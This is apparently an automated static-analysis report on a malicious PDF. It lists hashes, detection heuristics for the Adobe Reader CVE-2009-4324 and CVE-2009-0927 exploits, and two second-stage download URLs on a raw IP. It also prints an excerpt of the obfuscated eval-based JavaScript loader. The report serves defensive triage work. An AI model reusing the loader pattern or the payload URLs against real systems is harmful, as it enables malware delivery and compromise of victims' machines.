Malicious PDF — malware analysis report

Static analysis result for SHA-256 f27a017e23c01123…

Verdict: MALICIOUS
File type: PDF
Size: 13.4 KB
First seen: 2026-05-08
MD5: 9710b92b8415d13fb224fd47b5bbcbfc
SHA-1: ea9c1b7a9d319ee403de9c7c1260155333a8a430
SHA-256: f27a017e23c01123745c34824a587732119f1c73ad65a1964696420506e102f7
Risk Score: 310

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple Adobe Reader vulnerabilities, specifically CVE-2009-4324 and CVE-2009-0927, to achieve code execution. The deobfuscated JavaScript contains URLs that are used to download a second-stage payload. This indicates a multi-stage attack where the initial PDF serves as a dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (9)

  • media.newPlayer — CVE-2009-4324 (critical; CVE exact; rule CVE_2009_4324)
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 (critical; CVE exact; rule CVE_2009_0927)
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Multi-CVE Adobe Reader JavaScript exploit kit (critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT)
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY)
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs referenced by PDF JavaScript:
    • http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d7.php?f=g
    • http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d8.php?f=n

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0076_000.js | pdf-javascript-stream | PDF /JS object 76 at offset 0x38A | 12669 bytes
SHA-256: 63e2f1be4fa75a8247f4f2eae187d6d08626ce62d6e7b8d9afcf9857c82c7caf
Preview script
First 1,000 lines of the extracted script
a="0)r(Si,oa3]+|tbNxCc_n6d;{v>@=h}Iu7%[VD-p4&yP9'B<2sA.8e fg51lmFE:w";
w='';
w+='sl';
w+='i';
w+="c"+a[53];
j='b343tb3g';
j=j[w];
s='';
b='al';
b2=a[53]+a[25]+b;
for(i=0;i<z.length;i++){s+=a[z[i]]}
e=(j());
e=e[b2];
e(s);
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (alphabet-index-array) from JavaScript object 76 at offset 0x38A | 4469 bytes
SHA-256: 3635ce3d4a495b9dcc1ba7c03f6ba31653c2be2d262c647cbfb0d59269b27002
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery (percent-decode) from JavaScript object 76 at offset 0x38A | 4461 bytes
SHA-256: eaf167ee186b02b8eb5dfd37cf0efb79c48d4a98e0b69649137bbdd4f0132b18
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script